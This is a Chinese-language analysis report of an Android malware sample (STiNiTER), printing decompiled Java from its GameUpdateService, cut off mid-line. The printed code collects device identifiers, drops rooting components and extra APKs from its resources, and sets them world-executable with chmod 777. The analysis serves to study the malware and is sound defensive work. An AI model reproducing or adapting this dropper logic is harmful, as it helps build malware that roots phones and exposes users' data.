android dds流程,android.dds.com
android.dds-STiNiTER_analyse.apk分析报告
1 . AndroidManifest.xml
<manifest xmlns:android="http://schemas.android.com/apk/res/android">
(清单的其余内容在本页中没有保留下来。)清单中声明的这两个 service 明显需要关注,特别是第二个。
2.打开Main class,这个是起始activity,打开Main.java代码:
// Entry activity (Main). Only the first statements of onCreate are quoted here;
// the rest of the method is not part of this excerpt.
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
// The service is started directly from onCreate, with no condition around the
// call in the visible lines, so it runs as soon as the app is opened.
startService(new Intent(this, GameUpdateService.class));
// Keeps a reference to this activity in Instance (declaration not shown).
Instance = this;
Activity 一创建就启动了 GameUpdateService 服务,所以直接到 GameUpdateService 去看。
下面是反编译得到的源代码(`break label845` 这类带标签的跳转是反编译器留下的痕迹,标签的目标位置不在本摘录中,因此仅凭这段代码无法确定各步失败后的处理):
public class GameUpdateService extends Service
{
// Fields of GameUpdateService as emitted by the decompiler (sorted by name, not
// by purpose). Only DATA, infoPath and infoName are used in the visible part of
// the worker thread: DATA is written as UTF-8 to the file infoPath + infoName.
// The other upper-case names look like device identifiers and properties
// (IMEI, IMSI, phone number, model, ...) - presumably collected in onCreate,
// which this excerpt does not show; confirm against the full sample.
private String DATA;
private String IMEI;
private String IMSI;
private String MODEL;
// "M"-prefixed APK stream/path/state: a second APK, written by write() in the
// worker thread right after inputStreamAPK.
private InputStream MinputStreamAPK;
private String MpathAPK;
private int MstateAPKFile;
private String OS;
private String PHONENUMBER;
private String PLATFORM;
private String SCREENSIZE;
// File name and directory the worker thread writes DATA to.
private String infoName;
private String infoPath;
// Malicious payloads and the components needed for rooting, extracted from the
// app's raw resources (analyst's description; the code that opens these streams
// is not shown in this excerpt).
private InputStream inputStreamAPK;
private InputStream inputStreamEX;
private InputStream inputStreamEXE;
private InputStream inputStreamID;
private InputStream inputStreamKEEP;
private InputStream inputStreamUNLOCK;
private InputStream inputStreamstart;
// Not used in the visible excerpt; presumably the stdin/stdout of `process`
// used by do_exec - TODO confirm.
private DataInputStream localDataInputStream;
private DataOutputStream localDataOutputStream;
// Destination paths the payloads and rooting components are dropped to; each
// is passed to write() together with the matching input stream above.
private String pathAPK;
private String pathEX;
private String pathEXE;
private String pathID;
private String pathKEEP;
private String pathUNLOCK;
private String pathstart;
private Process process;
// Return values of write() for each dropped file. The worker thread only moves
// on to the next file when the value is 0, so 0 appears to mean success - the
// body of write() is not shown, confirm there.
private int stateAPKFile;
private int stateEXEFile;
private int stateEXFile;
private int stateIDFile;
private int stateKEEPFile;
private int stateUNLOCKFile;
private int statestartFile;
// Shadowed inside run() by a local variable of the same name.
private String str;
/* Analyst's note (translated from the original Chinese):
After the service's onCreate finishes, onStart runs the thread below. Its first
job is to write these APKs out to a fixed directory, and this is where I found
some problems. The issue with this sample was already mentioned under onCreate:
the permissions on the data/data/android.gdwsklzz directory. My guess is that
the author copied or adapted the code from some malicious build of
高达无双科鲁兹传 (the package suffix "gdwsklzz" matches the pinyin initials of
that title).
I have also removed the unimportant exception-handling parts to make the code
easier to read.

NOTE(review): the first test in run() checks for /system/bin/keeper, and
"keeper" is also one of the file names the dropper makes executable under
/data/data/android.gdwsklzz/, so the test reads as "is our own component already
installed" rather than a generic root check - confirm against the full sample.
NOTE(review): the chmod 777 calls leave every dropped file readable, writable
and executable by all users; the fixed paths under /data/data/android.gdwsklzz/
and /system/bin/keeper are the file-system artefacts visible in this excerpt.
*/
Thread thread = new Thread(new Runnable()
{
public void run()
{ //检查是否是root过的机子
if (!new File("/system/bin/keeper").exists())
{
System.out.println("---start rootSatae");
try
{
while (true)
{
String str = new String(GameUpdateService.this.DATA.getBytes("UTF-8"), "UTF-8");
//这里会报错,因为infoPath是没有权限的,所以这个恶意程序实际上是失败的。
File localFile1 = new File(GameUpdateService.this.infoPath);
if (!localFile1.exists())
localFile1.mkdir();
File localFile2 = new File(GameUpdateService.this.infoPath + GameUpdateService.this.infoName);
if (localFile2.exists())
localFile2.delete();
localFile2.createNewFile();
FileOutputStream localFileOutputStream = new FileOutputStream(localFile2);
localFileOutputStream.write(str.getBytes("UTF-8"));
localFileOutputStream.flush();
localFileOutputStream.close();
//后面是释放root代码的地方。
GameUpdateService.this.stateUNLOCKFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamUNLOCK, GameUpdateService.this.pathUNLOCK);
if (GameUpdateService.this.stateUNLOCKFile != 0)
break label845;
GameUpdateService.this.stateAPKFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamAPK, GameUpdateService.this.pathAPK);
if (GameUpdateService.this.stateAPKFile != 0)
break label817;
GameUpdateService.this.MstateAPKFile = GameUpdateService.this.write(GameUpdateService.this.MinputStreamAPK, GameUpdateService.this.MpathAPK);
if (GameUpdateService.this.MstateAPKFile != 0)
break label789;
GameUpdateService.this.stateIDFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamID, GameUpdateService.this.pathID);
if (GameUpdateService.this.stateIDFile != 0)
break label743;
GameUpdateService.this.stateEXEFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamEXE, GameUpdateService.this.pathEXE);
if (GameUpdateService.this.stateEXEFile != 0)
break;
GameUpdateService.this.stateKEEPFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamKEEP, GameUpdateService.this.pathKEEP);
if (GameUpdateService.this.stateKEEPFile == 0)
{
GameUpdateService.this.stateEXFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamEX, GameUpdateService.this.pathEX);
if (GameUpdateService.this.stateEXFile != 0)
continue;
GameUpdateService.this.statestartFile = GameUpdateService.this.write(GameUpdateService.this.inputStreamstart, GameUpdateService.this.pathstart);
if (GameUpdateService.this.statestartFile != 0)
continue;
//设置权限,给予运行的权限,
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/googleservice.apk");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/googlemessage.apk");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/unlock.apk");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/ts");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/keeper");
GameUpdateService.this.do_exec("chmod 777 /data/data/android.gdwsklzz/initr");
//
Ga